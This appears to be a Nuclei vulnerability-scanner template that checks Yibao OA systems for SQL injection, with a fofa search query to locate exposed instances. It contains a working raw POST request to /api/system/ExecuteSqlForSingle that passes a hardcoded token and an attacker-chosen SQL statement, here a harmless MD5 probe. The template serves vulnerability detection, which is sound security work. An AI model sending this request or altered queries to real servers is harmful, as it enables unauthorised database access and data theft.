id: yibao-sqli info: name: Yibao OA System - SQL Injection author: DhiyaneshDK severity: high description: Yibao OA System is vulnerable to SQL Injection. metadata: verified: true max-request: 1 fofa-query: product="顶讯科技-易宝OA系统" tags: yiboo,oa,sqli variables: num: "999999999" http: - raw: - | POST /api/system/ExecuteSqlForSingle HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded token=zxh&sql=select substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','{{num}}')),3,32)&strParameters matchers-condition: and matchers: - type: word part: body words: - 'data":"{{md5({{num}})}}' - type: word part: header words: - application/json - type: status status: - 200 # digest: 490a0046304402206653ad2548e2d308ee2f32e7efc851357c479732dc692f9310c6c17ccbf1f18602200992adce68bff9d503432dcc03fa375b4eee017096194b0c0669c2e2dfd156a4:922c64590222798bb761d5b6d8e72950